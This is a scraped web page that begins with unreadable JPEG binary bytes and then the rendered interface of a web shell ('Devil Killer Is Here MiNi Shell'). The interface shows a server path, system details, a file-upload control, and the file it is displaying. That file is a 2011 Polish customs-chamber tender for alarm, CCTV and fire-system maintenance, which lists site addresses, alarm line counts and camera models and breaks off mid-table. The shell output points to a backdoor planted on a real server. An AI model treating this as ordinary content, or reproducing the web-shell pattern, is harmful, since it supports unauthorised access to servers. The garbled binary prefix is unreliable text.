JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20111223/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20111223/437082-N-2011.html

<p class="kh_header"><b>Katowice: Konserwacja, modernizacja i naprawa elektronicznych systemów ostrzegania sieci antywłamaniowych, obserwacji TV oraz sieci przeciwpożarowych,</b><br>
<b>Numer ogłoszenia: 437082 - 2011; data zamieszczenia: 23.12.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Izba Celna w Katowicach , ul. Słoneczna 34, 40-136 Katowice, woj. śląskie, tel. 32 3587161, faks 32 3587204.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.katowice.ic.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja rządowa terenowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Konserwacja, modernizacja i naprawa elektronicznych systemów ostrzegania sieci antywłamaniowych, obserwacji TV oraz sieci przeciwpożarowych,.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest: konserwacja, modernizacja i naprawa elektronicznych systemów ostrzegania sieci antywłamaniowych, obserwacji TV oraz sieci przeciwpożarowych:
Zadanie Nr 1
Przedmiotem zamówienia jest konserwacja, modernizacja, naprawa oraz montaż systemów  antywłamaniowych, obserwacji TV:

a/ konserwacja funkcjonujących elektronicznych sieci antywłamaniowych w jednostkach organizacyjnych Zamawiającego, zgodnie z poniższym wykazem musi być wykonywana w systemie kwartalnym - 4 razy w roku oraz  obserwacji TV musi być wykonana w systemie półrocznym - 2 razy w roku. Przeglądy konserwacyjne kwartalne będą przeprowadzone w styczniu, kwietniu, lipcu oraz październiku, natomiast przeglądy półroczne w miesiącu styczniu i lipcu. Dokładne terminy prowadzenia prac konserwacyjnych będą ustalane na bieżąco w trybie roboczym. Konserwacja polegać powinna na utrzymaniu systemu w stałej gotowości, tj. przegląd oraz fizyczne sprawdzenie funkcjonowania jej elementów, usuwania bieżących usterek oraz niezwłocznym zgłaszaniu Zamawiającemu konieczności wykonania niezbędnych prac (napraw, modernizacji).
Koszt konserwacji obejmuje również dojazd oraz koszty niezbędnych materiałów pomocniczych, natomiast nie obejmuje wymiany baterii akumulatorów oraz usuwania uszkodzeń wykraczających poza  wynikłe z normalnego użytkowania.

b/ naprawy związane są z sytuacjami awaryjnymi. Na wezwanie Zamawiającego Wykonawca zobowiązany jest do podjęcia działań do 24 godz. po zgłoszeniu awarii. Wykonawca przed przystąpieniem do naprawy zobowiązany jest do przedstawienia pisemnej kalkulacji kosztów  naprawy w rozbiciu na robociznę i materiały. Kalkulacja podlega zatwierdzeniu przez Zamawiającego co jest równoznaczne z zapewnieniem środków finansowych. Wyjątkowo (w sytuacjach nie cierpiących zwłoki) dopuszcza się możliwość uzgodnienia telefonicznego kosztów naprawy - przedstawienie kalkulacji (post factum).

 c/ modernizacja zachodzi w sytuacji konieczności  zmian  w konfiguracji. Na żądanie Zamawiającego Wykonawca powinien sporządzić kalkulację kosztów wykonania nowych sieci, modernizacji, bądź ich demontażu.
Kalkulacja po zatwierdzeniu jest podstawą do wystawienia zlecenia na roboty. Po realizacji zlecenia wykonawca powinien sporządzić dokumentację powykonawczą oraz przeprowadzić szkolenie użytkowników w zakresie obsługi.
Materiały z demontażu instalacji, Wykonawca winien protokolarnie przekazać Zamawiającemu.
Na żądanie Zamawiającego Wykonawca powinien udokumentować koszt materiałów poprzez przedstawienie kserokopii faktur.
Nowo wykonane instalacje muszą być objęte co najmniej 12 miesięczną gwarancją. W ramach gwarancji wszelkie naprawy oraz cztery przeglądy konserwacyjne wykonywane będą nieodpłatnie za wyjątkiem udokumentowanych kosztów  materiałów (poza pomocniczymi).
Zadanie Nr 2 
Przedmiotem zamówienia jest konserwacja, modernizacja, naprawa oraz montaż systemów   przeciwpożarowych
 
a/ konserwacja funkcjonujących elektronicznych sieci przeciwpożarowych w jednostkach organizacyjnych Zamawiającego, zgodnie z poniższym wykazem musi być wykonywana w systemie rocznym (1 razy w roku). Przeglądy konserwacyjne roczne będą przeprowadzone w miesiącu wrześniu. Konserwacja polegać powinna na utrzymaniu systemu w stałej gotowości, tj. przegląd oraz fizyczne sprawdzenie funkcjonowania jej elementów, usuwania bieżących usterek oraz niezwłocznym zgłaszaniu Zamawiającemu konieczności wykonania niezbędnych prac (napraw, modernizacji).
Koszt konserwacji obejmuje również dojazd oraz koszty niezbędnych materiałów pomocniczych, natomiast nie obejmuje wymiany baterii akumulatorów oraz usuwania uszkodzeń wykraczających poza  wynikłe z normalnego użytkowania.
W razie konieczności wymiany sygnalizatorów pożaru z wbudowanymi elementami izotopowymi   wykonawca jest zobowiązany do  utylizacji czujek uszkodzonych zgodnie z przepisami.

b/ naprawy związane sytuacjami awaryjnymi. Na wezwanie Zamawiającego Wykonawca zobowiązuje się do podjęcia działań do 24 godz. po zgłoszeniu awarii. Wykonawca jest zobowiązany do przedstawienia pisemnej kalkulacji kosztów  naprawy w rozbiciu na robociznę i materiały. Kalkulacja podlega zatwierdzeniu przez Zamawiającego na podstawie której zostanie wystawione zlecenie. Wyjątkowo (w sytuacjach nie cierpiących zwłoki) dopuszcza się możliwość uzgodnienia telefonicznego kosztów naprawy - przedstawienie kalkulacji (post factum).

W razie konieczności wymiany sygnalizatorów pożaru z wbudowanymi elementami izotopowymi   wykonawca jest zobowiązany do  utylizacji czujek uszkodzonych zgodnie z przepisami.

c/ modernizacja  zachodzi w sytuacji konieczności  zmian  w konfiguracji. Na żądanie Zamawiającego Wykonawca powinien sporządzić kalkulację kosztów wykonania nowych sieci, modernizacji, bądź ich demontażu sieci. Wykonanie nowej sieci musi być poprzedzone kalkulacją. 
Kalkulacja po zatwierdzeniu jest podstawą do wystawienia zlecenia na roboty. Po realizacji zlecenia wykonawca powinien sporządzić dokumentację powykonawczą oraz przeprowadzić szkolenie użytkowników w zakresie obsługi.
Materiały z demontażu instalacji, które można wtórnie wykorzystać Wykonawca winien protokolarnie przekazać Zamawiającemu. 
Na żądanie Zamawiającego Wykonawca powinien udokumentować koszt materiałów poprzez przedstawienie kserokopii faktur.
Nowo wykonane instalacje muszą być objęte co najmniej 12 miesięczną gwarancją. W ramach gwarancji wszelkie naprawy oraz cztery przeglądy konserwacyjne wykonywane będą nieodpłatnie za wyjątkiem udokumentowanych kosztów  materiałów (poza pomocniczymi).
Zadanie Nr 3
Przedmiotem zamówienia jest konserwacja systemów  antywłamaniowych, obserwacji TV:

a/ konserwacja funkcjonujących elektronicznych sieci antywłamaniowych w jednostkach organizacyjnych Zamawiającego, zgodnie z poniższym wykazem musi być wykonywana w systemie kwartalnym - 4 razy w roku oraz  obserwacji TV musi być wykonana w systemie półrocznym - 2 razy w roku. Przeglądy konserwacyjne kwartalne będą przeprowadzone w styczniu, kwietniu, lipcu oraz październiku, natomiast przeglądy półroczne w miesiącu styczniu i lipcu. Dokładne terminy prowadzenia prac konserwacyjnych będą ustalane na bieżąco w trybie roboczym. Konserwacja polegać powinna na utrzymaniu systemu w stałej gotowości, tj. przegląd oraz fizyczne sprawdzenie funkcjonowania jej elementów oraz niezwłocznym zgłaszaniu Zamawiającemu konieczności wykonania niezbędnych prac (napraw).
Koszt konserwacji obejmuje również koszt dojazdu, natomiast nie obejmuje usuwania uszkodzeń wykraczających poza  normalne użytkowanie.
Zadanie 4
Przedmiotem zamówienia jest konserwacja systemów   przeciwpożarowych.
 
a/ konserwacja funkcjonujących elektronicznych sieci przeciwpożarowych w siedzibie Izbie Celnej w Katowicach zgodnie z poniższym wykazem musi być wykonywana w systemie rocznym. Przeglądy konserwacyjne roczne będą przeprowadzone w miesiącu wrześniu. Konserwacja polegać powinna na utrzymaniu systemu w stałej gotowości, tj. przegląd oraz fizyczne sprawdzenie funkcjonowania jej elementów, usuwania bieżących usterek oraz niezwłocznym zgłaszaniu Zamawiającemu konieczności wykonania niezbędnych prac (napraw).
Koszt konserwacji obejmuje również koszt dojazdu, natomiast nie obejmuje usuwania uszkodzeń wykraczających poza  normalne użytkowanie..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 50.71.00.00-5, 50.80.00.00-3, 45.31.21.00-8, 45.31.22.00-9, 92.22.20.00-3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 24.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie pobiera się</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi posiadać zezwolenie Prezesa Agencji Atomistyki na działalność związaną z narażeniem na promieniowanie jonizujące (dotyczy Wykonawców którzy złożą ofertę do zadania nr 2 i/lub 4).
Ocena spełniania warunków dokonywana będzie w systemie 0 - 1 (zero - jedynkowym, tj. spełnia - nie spełnia).</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu wykazania spełniania warunków udziału w postępowaniu o udzielenie zamówienia, Wykonawca wraz z ofertą winien złożyć oświadczenie o spełnianiu warunków udziału w postępowaniu o których mowa w art. 22 ust. 1 ustawy (druk oświadczenia stanowi załącznik nr 2 do SIWZ), Ocena spełniania warunków dokonywana będzie w systemie 0 - 1 (zero - jedynkowym, tj. spełnia - nie spełnia).</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu wykazania spełniania warunków udziału w postępowaniu o udzielenie zamówienia, Wykonawca wraz z ofertą winien złożyć oświadczenie o spełnianiu warunków udziału w postępowaniu o których mowa w art. 22 ust. 1 ustawy (druk oświadczenia stanowi załącznik nr 2 do SIWZ), Ocena spełniania warunków dokonywana będzie w systemie 0 - 1 (zero - jedynkowym, tj. spełnia - nie spełnia).</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi dysponować osobami które posiadają licencję pracownika zabezpieczenia technicznego drugiego stopnia.
Ocena spełniania warunków dokonywana będzie w systemie 0 - 1 (zero - jedynkowym, tj. spełnia - nie spełnia).</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu wykazania spełniania warunków udziału w postępowaniu o udzielenie zamówienia, Wykonawca wraz z ofertą winien złożyć oświadczenie o spełnianiu warunków udziału w postępowaniu o których mowa w art. 22 ust. 1 ustawy (druk oświadczenia stanowi załącznik nr 2 do SIWZ), Ocena spełniania warunków dokonywana będzie w systemie 0 - 1 (zero - jedynkowym, tj. spełnia - nie spełnia).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Jeżeli upoważnienie do podpisania oferty nie wynika wprost z dokumentu stwierdzającego status prawny Wykonawcy to do oferty należy dołączyć stosowne pełnomocnictwo w formie oryginału lub uwierzytelnionej kopii. Kopia pełnomocnictwa nie może być uwierzytelniona przez upełnomocnionego.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza możliwość wprowadzenie następujących zmian:
1)	zmiany wartości umowy - w przypadku zwiększenia bądź zmniejszenia stawek podatku od towarów i usług, podatku akcyzowego, cła na podstawie odrębnych przepisów, które wejdą w życie po dniu zawarcia Umowy, a przed wykonaniem przez Wykonawcę obowiązku po wykonaniu, którego Wykonawca jest uprawniony do uzyskania wynagrodzenia, wynagrodzenie Wykonawcy może ulec odpowiedniemu zwiększeniu bądź zmniejszeniu, jeżeli w wyniku zastosowania zmienionych stawek podatków ulega zmianie kwota należnego podatku oraz wynagrodzenie Wykonawcy uwzględniające podatek od towarów i usług, podatek akcyzowy cło.
2)	zmiany umówionego terminu  wykonania zamówienia  - z powodu działań osób trzecich uniemożliwiających wykonanie zamówienia, które to działania nie są konsekwencją winy którejkolwiek ze stron. 
3)	zmianę lokalizacji poszczególnych systemów antywłamaniowych/ TV,
4)	montaż nowych systemów antywłamaniowych/ TV,
5)	rozbudowę / modernizację systemów antywłamaniowych/ TV,
6)	demontażu poszczególnych systemów alarmowych/ TV,
7)	zmianę lokalizacja  wbudowanych urządzeń systemów przeciwpożarowych,
8)	montażu nowych systemów przeciwpożarowych,
9)	rozbudowę / modernizację systemów przeciwpożarowych,
10)	demontaż poszczególnych systemów przeciwpożarowych,</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.katowice.ic.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> siedziba Izby Celnej w Katowicach, 40-136 Katowice ul. Słoneczna 34, I piętro pok. 124.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 05.01.2012 godzina 10:00, miejsce: siedziba Izby Celnej w Katowicach, 40-136 Katowice ul. Słoneczna 34, Biuro Podawcze, parter.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Konserwacja, modernizacja, naprawa oraz montaż systemów  antywłamaniowych, obserwacji TV..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest konserwacja, modernizacja, naprawa oraz montaż systemów  antywłamaniowych, obserwacji TV:

a/ konserwacja funkcjonujących elektronicznych sieci antywłamaniowych w jednostkach organizacyjnych Zamawiającego, zgodnie z poniższym wykazem musi być wykonywana w systemie kwartalnym - 4 razy w roku oraz  obserwacji TV musi być wykonana w systemie półrocznym - 2 razy w roku. Przeglądy konserwacyjne kwartalne będą przeprowadzone w styczniu, kwietniu, lipcu oraz październiku, natomiast przeglądy półroczne w miesiącu styczniu i lipcu. Dokładne terminy prowadzenia prac konserwacyjnych będą ustalane na bieżąco w trybie roboczym. Konserwacja polegać powinna na utrzymaniu systemu w stałej gotowości, tj. przegląd oraz fizyczne sprawdzenie funkcjonowania jej elementów, usuwania bieżących usterek oraz niezwłocznym zgłaszaniu Zamawiającemu konieczności wykonania niezbędnych prac (napraw, modernizacji).
Koszt konserwacji obejmuje również dojazd oraz koszty niezbędnych materiałów pomocniczych, natomiast nie obejmuje wymiany baterii akumulatorów oraz usuwania uszkodzeń wykraczających poza  wynikłe z normalnego użytkowania.

b/ naprawy związane są z sytuacjami awaryjnymi. Na wezwanie Zamawiającego Wykonawca zobowiązany jest do podjęcia działań do 24 godz. po zgłoszeniu awarii. Wykonawca przed przystąpieniem do naprawy zobowiązany jest do przedstawienia pisemnej kalkulacji kosztów  naprawy w rozbiciu na robociznę i materiały. Kalkulacja podlega zatwierdzeniu przez Zamawiającego co jest równoznaczne z zapewnieniem środków finansowych. Wyjątkowo (w sytuacjach nie cierpiących zwłoki) dopuszcza się możliwość uzgodnienia telefonicznego kosztów naprawy - przedstawienie kalkulacji (post factum).

 c/ modernizacja zachodzi w sytuacji konieczności  zmian  w konfiguracji. Na żądanie Zamawiającego Wykonawca powinien sporządzić kalkulację kosztów wykonania nowych sieci, modernizacji, bądź ich demontażu.
Kalkulacja po zatwierdzeniu jest podstawą do wystawienia zlecenia na roboty. Po realizacji zlecenia wykonawca powinien sporządzić dokumentację powykonawczą oraz przeprowadzić szkolenie użytkowników w zakresie obsługi.
Materiały z demontażu instalacji, Wykonawca winien protokolarnie przekazać Zamawiającemu.
Na żądanie Zamawiającego Wykonawca powinien udokumentować koszt materiałów poprzez przedstawienie kserokopii faktur.
Nowo wykonane instalacje muszą być objęte co najmniej 12 miesięczną gwarancją. W ramach gwarancji wszelkie naprawy oraz cztery przeglądy konserwacyjne wykonywane będą nieodpłatnie za wyjątkiem udokumentowanych kosztów  materiałów (poza pomocniczymi).

Wykonanie usług konserwacji, naprawy, modernizacji winno być każdorazowo potwierdzone protokołem, podpisanym przez pracownika Wykonawcy oraz ze strony Zamawiającego przez Kierownika jednostki organizacyjnej lub upoważnionego pracownika. 
Protokół  Wykonawca winien dołączyć do faktury VAT  za wykonaną usługę.

Należność za wykonaną usługę płatna będzie na podstawie faktury VAT, przelewem w terminie do 21 dni od daty otrzymania faktury  z kompletem załączników.
Na fakturze należy przywołać numer dokumentu upoważniającego do realizacji (nr umowy, zlecenia).
Wykonawca jest zobowiązany do utrzymania w tajemnicy pod groźbą odpowiedzialności karnej, wszelkich informacji związanych z  realizacją robót.


Lokalizacja systemów  antywłamaniowych 

Lp.	Lokalizacja systemu/adres	Ilość linii dozorowych SWiN	Urządzenia obserwacji TV
1	IC Katowice  Wydział Wsparcia Systemów Centralnych HELP DESK (biura)
Cieszyn ul. Bielska 47	10	
2	OC Gliwice 
Gliwice ul. Portowa 28	13	
3	IC Katowice Wydział Wsparcia Systemów Centralnych HELP DESK (archiwum)
Cieszyn ul. Bielska 47	12	
4	OC Racibórz
Racibórz ul.  Kościuszki 7	13	
5	OC Cieszyn 
Cieszyn ul. Graniczna 1	7	
6	OC Czechowice - Dziedzice
ul. Mazańcowicka 70 	4	
7	OC Żywiec
Żywiec ul. Fabryczna 5	11		
8	OC Chorzów
Chorzów ul. Gałeczki 61	5	
9	OC Tychy 
Tychy ul. Fabryczna 2	5	
10	OC Sławków
Sławków ul. Groniec1	5	
11	Magazyn likwidacyjny nr 1
Cieszyn ul. Mostowa 4	15	
12	Magazyn likwidacyjny nr 2  
Cieszyn ul. Mostowa 4	5	
13	OC Cieszyn ( archiwum)
Cieszyn ul. Graniczna 1 	4	
14	UC Rybnik
Rybnik ul. Armii Krajowej 3	23	
15	UC Rybnik Segment - D
Rybnik ul. Armii Krajowej 3	22	
16	Magazyn  RGM Czechowice Dziedzice ul. Mazańcowicka 70	8	
17	Magazyn  RGM Cieszyn ul. Bielska 47a	8	
18	UC Częstochowa
Częstochowa
 ul. Rydza - Śmigłego 26	27	Kamery:
- wewnętrzne - TAYAMA C3804-01 A1 -2szt
- wewnętrzne - SAFER SF 2000 - 2 szt.
-zewnętrzna - C4113 NIC - 1szt.
- zewnętrzna GANZ ZC-NH 258P - 1 szt.
Rejestrator VTV-N-2108 -1 szt.
19	OC Częstochowa
Częstochowa ul. Legionów 59a	25	
20	Magazyn UC Katowice
Katowice ul. Żelazna 9	28	
21	Magazyn UC Rybnik
